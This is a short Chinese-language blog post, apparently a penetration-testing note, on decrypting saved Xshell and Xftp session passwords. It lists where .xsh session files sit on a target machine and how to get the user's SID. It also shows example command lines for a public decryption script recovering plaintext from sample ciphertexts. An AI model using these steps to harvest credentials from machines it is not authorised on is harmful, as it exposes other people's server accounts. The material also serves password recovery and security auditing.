解密-Xmanager密码解密

Xmanager密码解密 (Xshell Xftp 基本一样)

快速说明(实测wind7 Xshell密码解密)

1. 需要whoami 和 配置文件
1. `只能在window机器上解密`,因为要安装pypiwin32, pycryptodome
2. python3环境

步骤一 获得目标sid 获得目标机器上的密码配置文件(具体的配置文件是以 .xsh 的文件)

版本 Session File Location
XShell 5 %userprofile%\Documents\NetSarang\Xshell\Sessions
XFtp 5 %userprofile%\Documents\NetSarang\Xftp\Sessions
XShell 6 %userprofile%\Documents\NetSarang Computer\6\Xshell\Sessions
XFtp 6 %userprofile%\Documents\NetSarang Computer\6\Xftp\Sessions

步骤二 从上一步的xsh文件中,获得版本号,加密的密码


步骤三 使用脚本解密 https://github.com/HyperSine/how-does-Xmanager-encrypt-password

$ XShellCryptoHelper.py -d -ver 5.0 /6KaTrKwm0cmhr0yAWQ=
This is a test

$ XFtpCryptoHelper.py -d -ver 5.0 TPKSg0QQ6o795vnPIMs=
This is a test

$ XShellCryptoHelper.py -d -ver 5.1 -sid S-1-5-21-917267712-1342860078-1792151419-512 hIMxIyQ3HbJsVIdbbunHvh7ZAvuN1NSJl8ZFL11+UJ+82+KAixa89O3OTAfRTg==
This is a test

$ XShellCryptoHelper.py -d -ver 5.3 -user Administrator -sid S-1-5-21-917267712-1342860078-1792151419-512 zv21O1x43qRs3c5NckDHvh7ZAvuN1NSJl8ZFL11+UJ+82+KAixa89O3OTAfRTg==
This is a test

$ XShellCryptoHelper.py -d -key 123123 Rrm3P3AL0iDV7nBbS2bHvh7ZAvuN1NSJl8ZFL11+UJ+82+KAixa89O3OTAfRTg==
This is a test
posted @ 2022-11-20 16:07  是谁走漏了消息  阅读(760)  评论(0编辑  收藏  举报